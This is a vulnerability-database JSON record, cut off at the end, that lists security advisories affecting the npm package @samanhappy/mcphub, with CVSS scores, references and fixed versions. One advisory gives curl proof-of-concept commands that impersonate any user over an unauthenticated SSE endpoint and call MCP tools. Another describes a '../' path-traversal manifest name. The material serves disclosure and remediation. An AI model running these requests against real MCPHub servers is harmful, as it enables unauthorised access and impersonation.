{"url":"http://public2.vulnerablecode.io/api/packages/861840?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.0.23","type":"npm","namespace":"@samanhappy","name":"mcphub","version":"0.0.23","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.12.15","latest_non_vulnerable_version":"0.12.15","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360472?format=json","vulnerability_id":"VCID-3cmx-144n-mucv","summary":"@samanhappy/mcphub: SSE Endpoint Accepts Arbitrary Username from URL Path Without Authentication, Enabling User Impersonation\n### Summary\n\nA critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user — including administrators — on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.\n\n### Details\n\nMCPHub provides user-scoped SSE endpoints at the path `/:user/sse/:group`. The `sseUserContextMiddleware` in `src/middlewares/userContext.ts` (lines 42–75) extracts the username from `req.params.user` and constructs a fabricated `IUser` object directly, bypassing all authentication:\n\n```typescript\nexport const sseUserContextMiddleware = async (\n  req: Request, res: Response, next: NextFunction,\n): Promise<void> => {\n  const userContextService = UserContextService.getInstance();\n  const username = req.params.user;  // ← Taken directly from URL, no validation whatsoever\n\n  if (username) {\n    // Note: In a real implementation, you should validate the user exists\n    // and has proper permissions\n    const user: IUser = {\n      username,          // ← Completely attacker-controlled\n      password: '',\n      isAdmin: false,    // TODO: Should be retrieved from user database\n    };\n\n    userContextService.setCurrentUser(user);  // ← Fabricated identity is accepted as real\n    attachCleanupHandlers();\n    console.log(`User context set for SSE/MCP endpoint: ${username}`);\n    next();\n  }\n  // ...\n};\n```\n\nThe SSE routes in `src/server.ts` (lines 132–161) apply only rate limiting and this context middleware — there is no authentication middleware in the chain:\n\n```typescript\n// User-scoped routes with user context middleware\nthis.app.get(\n  `${this.basePath}/:user/sse/:group(.*)?`,\n  mcpConnectionRateLimiter,        // Only rate limiting\n  sseUserContextMiddleware,         // Identity from URL — no auth\n  (req, res) => handleSseConnection(req, res),\n);\n```\n\nAdditionally, `UserContextService` is a **singleton** that stores the current user in a single instance variable. Under concurrent connections, one user's context can silently overwrite another's, creating a secondary race condition vulnerability (CWE-362).\n\n### PoC\n\n**Prerequisites:** A running MCPHub instance with `enableBearerAuth: false` (or bearer keys not configured).\n\n**Step 1 — Connect to the SSE endpoint as any arbitrary user:**\n```bash\ncurl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse\n```\n\nExpected response — a valid SSE session is created:\n```\nevent: endpoint\ndata: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758\n```\n\n**Step 2 — Verify on the server side (server logs):**\n```\n[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated\n[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages\n[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated\n```\n\nThe server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.\n\n**Step 3 — Execute MCP tool calls under the spoofed identity:**\n\nOnce the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user's context:\n```bash\ncurl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"tools/call\",\"params\":{\"name\":\"any-tool\",\"arguments\":{}}}'\n```\n\n### Impact\n\nThis is a **user identity spoofing** vulnerability on the MCP transport layer. Any unauthenticated network user can:\n\n- **Impersonate any user**, including administrators, on SSE/MCP endpoints\n- **Execute MCP tool calls** under a spoofed user's identity, potentially accessing user-scoped resources and data\n- **Poison audit logs** — all actions are recorded under the fabricated username, destroying accountability and forensic value\n- **Access user-scoped servers and groups** that should only be available to authenticated users\n\nAll MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.\n\nReported by the Eresus Security Research Team.","references":[{"reference_url":"https://github.com/samanhappy/mcphub/releases/tag/v0.12.15","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/samanhappy/mcphub/releases/tag/v0.12.15"},{"reference_url":"https://github.com/samanhappy/mcphub/security/advisories/GHSA-wf8q-wvv8-p8jf","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/samanhappy/mcphub/security/advisories/GHSA-wf8q-wvv8-p8jf"},{"reference_url":"https://github.com/advisories/GHSA-wf8q-wvv8-p8jf","reference_id":"GHSA-wf8q-wvv8-p8jf","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf8q-wvv8-p8jf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/376136?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.12.15","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.15"}],"aliases":["GHSA-wf8q-wvv8-p8jf"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3cmx-144n-mucv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359776?format=json","vulnerability_id":"VCID-ctc9-v5xx-dfg7","summary":"MCPHub has Path Traversal via Malicious MCPB Manifest Name\n**MCPB File Upload Handler** extracts a ZIP file and reads `manifest.json` from it. The `name` field in the manifest is directly concatenated into a file path (line 107) without any sanitization or path traversal character validation. An attacker can craft a malicious MCPB file where `manifest.name` is set to something like `../../../etc/malicious`, causing the file to be extracted to an arbitrary location on the file system. The `cleanupOldMcpbServer` function (line 110) also uses the unsanitized name, potentially allowing deletion of arbitrary directories.\n\n## 1. Summary\n- **Vulnerability Type**: Path Traversal (CWE-22)\n- **Sink Location**: src/controllers/mcpbController.ts:107\n- **Vulnerability Description**: The `name` field from an uploaded MCPB manifest is used directly, without sanitization or normalization, to construct a file system path for directory creation and move operations, which may lead to path traversal attacks.\n\n## 2. Analysis Logic\n\n### Step 1: Inspect the identified sink (src/controllers/mcpbController.ts:106-116)\nI examined the upload handler and located the file system sink where `manifest.name` is used to build the final extraction path and write files to that path.\n\n```ts\n// src/controllers/mcpbController.ts:106-116\n// Use server name as the final extract directory for automatic version management\nconst finalExtractDir = path.join(path.dirname(mcpbFilePath), `server-${manifest.name}`);\n\n// Clean up any existing version of this server\ncleanupOldMcpbServer(manifest.name);\nif (!fs.existsSync(finalExtractDir)) {\n  fs.mkdirSync(finalExtractDir, { recursive: true });\n}\n\n// Move the temporary directory to the final location\nfs.renameSync(tempExtractDir, finalExtractDir);\n```\n\nAnalysis: `manifest.name` is used to build `finalExtractDir`, which is then operated on by `fs.mkdirSync` and `fs.renameSync`. These are file system write/move operations, so if `name` is user-controlled and unsanitized, this is a path traversal sink. Next, I traced the origin of `manifest.name`.\n\n### Step 2: Trace the source of `manifest.name` in the upload handler (src/controllers/mcpbController.ts:83-104)\nI traced back the data flow to see how the manifest is read and validated.\n\n```ts\n// src/controllers/mcpbController.ts:83-104\nconst manifestPath = path.join(tempExtractDir, 'manifest.json');\nif (!fs.existsSync(manifestPath)) {\n  throw new Error('manifest.json not found in MCPB file');\n}\n\nconst manifestContent = fs.readFileSync(manifestPath, 'utf-8');\nconst manifest = JSON.parse(manifestContent);\n\n// Validate required fields in manifest\nif (!manifest.manifest_version) {\n  throw new Error('Invalid manifest: missing manifest_version');\n}\nif (!manifest.name) {\n  throw new Error('Invalid manifest: missing name');\n}\n```\n\nAnalysis: `manifest` is parsed directly from `manifest.json` inside the uploaded archive. The only check on `manifest.name` is that it is non‑empty; there is no sanitization, normalization, or allow‑list validation. Next, I confirmed the entry point for uploading MCPB files to verify user control.\n\n### Step 3: Trace the HTTP entry point in src/routes/index.ts:297-299\nI located the route that exposes the upload handler.\n\n```ts\n// src/routes/index.ts:297-299\n// MCPB upload routes\nrouter.post('/mcpb/upload', uploadMiddleware, uploadMcpbFile);\n```\n\nAnalysis: The `/mcpb/upload` endpoint invokes `uploadMiddleware` and `uploadMcpbFile`, so user‑supplied uploads are the source of the manifest content. Next, I verified the upload middleware behavior.\n\n### Step 4: Confirm the upload middleware (src/controllers/mcpbController.ts:8-38)\nI inspected how the uploaded file is received and stored.\n\n```ts\n// src/controllers/mcpbController.ts:8-38\nconst storage = multer.diskStorage({\n  destination: (_req, _file, cb) => {\n    const uploadDir = path.join(process.cwd(), 'data/uploads/mcpb');\n    if (!fs.existsSync(uploadDir)) {\n      fs.mkdirSync(uploadDir, { recursive: true });\n    }\n    cb(null, uploadDir);\n  },\n  filename: (_req, file, cb) => {\n    const timestamp = Date.now();\n    const originalName = path.parse(file.originalname).name;\n    cb(null, `${originalName}-${timestamp}.mcpb`);\n  },\n});\n\nconst upload = multer({\n  storage,\n  fileFilter: (_req, file, cb) => {\n    if (file.originalname.endsWith('.mcpb')) {\n      cb(null, true);\n    } else {\n      cb(new Error('Only .mcpb files are allowed'));\n    }\n  },\n  limits: {\n    fileSize: 500 * 1024 * 1024, // 500MB limit\n  },\n});\n\nexport const uploadMiddleware = upload.single('mcpbFile');\n```\n\nAnalysis: The upload middleware only checks file extension and size. It does not restrict or validate the contents of the archive or `manifest.name`. Therefore, `manifest.name` is user‑controlled input. Next, I checked whether any sanitization or normalization is applied before reaching the sink.\n\n### Step 5: Verify lack of path validation on `manifest.name` in src/controllers/mcpbController.ts:92-110\nI verified that no path sanitization occurs between parsing and usage.\n\n```ts\n// src/controllers/mcpbController.ts:92-110\nif (!manifest.name) {\n  throw new Error('Invalid manifest: missing name');\n}\n// ...\nconst finalExtractDir = path.join(path.dirname(mcpbFilePath), `server-${manifest.name}`);\ncleanupOldMcpbServer(manifest.name);\n```\n\nAnalysis: Before using `manifest.name` to construct a file system path, there is no `path.resolve`/`realpath` check, no use of `basename()`, and no allow‑list validation. This confirms that the path is built from untrusted input without defenses.\n\n### Step 6: Examine cleanup behavior using the unsanitized name (src/controllers/mcpbController.ts:41-52)\nI verified how `cleanupOldMcpbServer` uses the same input.\n\n```ts\n// src/controllers/mcpbController.ts:41-52\nconst uploadDir = path.join(process.cwd(), 'data/uploads/mcpb');\nconst serverPattern = `server-${serverName}`;\n\nif (fs.existsSync(uploadDir)) {\n  const files = fs.readdirSync(uploadDir);\n  files.forEach((file) => {\n    if (file.startsWith(serverPattern)) {\n      const filePath = path.join(uploadDir, file);\n      if (fs.statSync(filePath).isDirectory()) {\n        fs.rmSync(filePath, { recursive: true, force: true });\n      }\n    }\n  });\n}\n```\n\nAnalysis: `serverName` is used without validation, but the deletion is limited to directories already present in `uploadDir` as returned by `readdirSync`. The main traversal risk remains in constructing the path for `finalExtractDir` and the subsequent file system operations.\n\n### Analysis Walkthrough\n- Q1: Does user‑controllable input affect the file path? → **Yes**. `manifest.name` is read from the uploaded archive’s `manifest.json` and used in `path.join(...)` to build `finalExtractDir` (src/controllers/mcpbController.ts:89-110).\n- Q2: Is the path normalized and validated against a base directory? → **No**. There is no `resolve`/`realpath` + `startsWith` check before `fs.mkdirSync`/`fs.renameSync` (src/controllers/mcpbController.ts:106-116).\n- Q3: Is `basename()`/`getName()` used to strip directory components? → **No**. `manifest.name` is used directly in a template string (src/controllers/mcpbController.ts:106-107).\n- Q4: Is there a valid allow‑list for allowed names? → **No**. Only an existence check is performed on `manifest.name` (src/controllers/mcpbController.ts:92-97).\n- Q5: Is the code in a test/demo/deprecated/generated context? → **No**. This is a production controller and route (src/controllers/mcpbController.ts:64-130, src/routes/index.ts:297-299).\n- → Reached leaf node: **True Positive**\n\n## 3. Conclusion\n**True Positive**\n\n**Key evidence:**\n- `manifest.name` flows directly into `finalExtractDir` and is used by `fs.mkdirSync` and `fs.renameSync` without sanitization (src/controllers/mcpbController.ts:106-116).\n- `manifest.name` is parsed from `manifest.json` inside an uploaded archive, with only a non‑empty check (src/controllers/mcpbController.ts:89-97).\n- The `/mcpb/upload` endpoint exposes the upload handler that processes user‑supplied archives (src/routes/index.ts:297-299).\n\n## 4. Remediation Recommendations\n- Add normalization and base directory validation before using `manifest.name` to construct `finalExtractDir` (e.g., `const resolved = path.resolve(baseDir, `server-${safeName}`); if (!resolved.startsWith(baseDir)) reject;`).\n- Use `path.basename()` to strip directory components from `manifest.name` and enforce a strict character allow‑list (alphanumeric, `_`, `-`, `.`) before use.\n- Consider rejecting any `manifest.name` that contains path separators or traversal sequences, and add unit tests for malicious traversal inputs.","references":[{"reference_url":"https://github.com/samanhappy/mcphub/commit/af5b013c09bb0add6b7ad9aaa5b875cf150d2a7c","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/samanhappy/mcphub/commit/af5b013c09bb0add6b7ad9aaa5b875cf150d2a7c"},{"reference_url":"https://github.com/samanhappy/mcphub/security/advisories/GHSA-p3h2-2j4p-p83g","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/samanhappy/mcphub/security/advisories/GHSA-p3h2-2j4p-p83g"},{"reference_url":"https://github.com/advisories/GHSA-p3h2-2j4p-p83g","reference_id":"GHSA-p3h2-2j4p-p83g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p3h2-2j4p-p83g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373419?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.12.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cmx-144n-mucv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.13"}],"aliases":["GHSA-p3h2-2j4p-p83g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ctc9-v5xx-dfg7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/123286?format=json","vulnerability_id":"VCID-dnq5-b1xm-7kh2","summary":"MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-13822","reference_id":"","reference_type":"","scores":[{"value":"0.00246","scoring_system":"epss","scoring_elements":"0.4833","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00246","scoring_system":"epss","scoring_elements":"0.48347","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00246","scoring_system":"epss","scoring_elements":"0.48193","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-13822"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-13822","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-13822"},{"reference_url":"https://cert.pl/en/posts/2026/04/CVE-2025-13822","reference_id":"CVE-2025-13822","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:06:44Z/"}],"url":"https://cert.pl/en/posts/2026/04/CVE-2025-13822"},{"reference_url":"https://github.com/advisories/GHSA-9vq7-9h42-j88h","reference_id":"GHSA-9vq7-9h42-j88h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9vq7-9h42-j88h"},{"reference_url":"https://github.com/samanhappy/mcphub","reference_id":"mcphub","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:06:44Z/"}],"url":"https://github.com/samanhappy/mcphub"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373331?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cmx-144n-mucv"},{"vulnerability":"VCID-ctc9-v5xx-dfg7"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.0"}],"aliases":["CVE-2025-13822","GHSA-9vq7-9h42-j88h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dnq5-b1xm-7kh2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/121901?format=json","vulnerability_id":"VCID-usx6-j1jv-p3a9","summary":"A vulnerability was identified in samanhappy MCPHub up to 0.9.10. This vulnerability affects the function handleSseConnectionfunction of the file src/services/sseService.ts. Such manipulation leads to improper authentication. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-11287","reference_id":"","reference_type":"","scores":[{"value":"0.00319","scoring_system":"epss","scoring_elements":"0.55424","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00319","scoring_system":"epss","scoring_elements":"0.55559","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00319","scoring_system":"epss","scoring_elements":"0.55544","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-11287"},{"reference_url":"https://github.com/August829/YU1/issues/8","reference_id":"8","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-07T13:39:15Z/"}],"url":"https://github.com/August829/YU1/issues/8"},{"reference_url":"https://vuldb.com/?ctiid.327045","reference_id":"?ctiid.327045","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-07T13:39:15Z/"}],"url":"https://vuldb.com/?ctiid.327045"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-11287","reference_id":"CVE-2025-11287","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-11287"},{"reference_url":"https://github.com/advisories/GHSA-v7c4-33vf-cqqq","reference_id":"GHSA-v7c4-33vf-cqqq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v7c4-33vf-cqqq"},{"reference_url":"https://vuldb.com/?id.327045","reference_id":"?id.327045","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-07T13:39:15Z/"}],"url":"https://vuldb.com/?id.327045"},{"reference_url":"https://vuldb.com/?submit.661170","reference_id":"?submit.661170","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-07T13:39:15Z/"}],"url":"https://vuldb.com/?submit.661170"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/861875?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cmx-144n-mucv"},{"vulnerability":"VCID-ctc9-v5xx-dfg7"},{"vulnerability":"VCID-dnq5-b1xm-7kh2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.11"}],"aliases":["CVE-2025-11287","GHSA-v7c4-33vf-cqqq"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-usx6-j1jv-p3a9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/122365?format=json","vulnerability_id":"VCID-yvc7-97ny-wkgy","summary":"A vulnerability was found in samanhappy MCPHub up to 0.9.10. Affected by this issue is some unknown functionality of the file src/controllers/serverController.ts. The manipulation of the argument command/args results in os command injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-11285","reference_id":"","reference_type":"","scores":[{"value":"0.0072","scoring_system":"epss","scoring_elements":"0.72932","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0072","scoring_system":"epss","scoring_elements":"0.73025","published_at":"2026-06-13T12:55:00Z"},{"value":"0.0072","scoring_system":"epss","scoring_elements":"0.73009","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-11285"},{"reference_url":"https://github.com/August829/YU1/issues/6","reference_id":"6","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"6.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-07T14:02:41Z/"}],"url":"https://github.com/August829/YU1/issues/6"},{"reference_url":"https://vuldb.com/?ctiid.327043","reference_id":"?ctiid.327043","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"6.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-07T14:02:41Z/"}],"url":"https://vuldb.com/?ctiid.327043"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-11285","reference_id":"CVE-2025-11285","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}]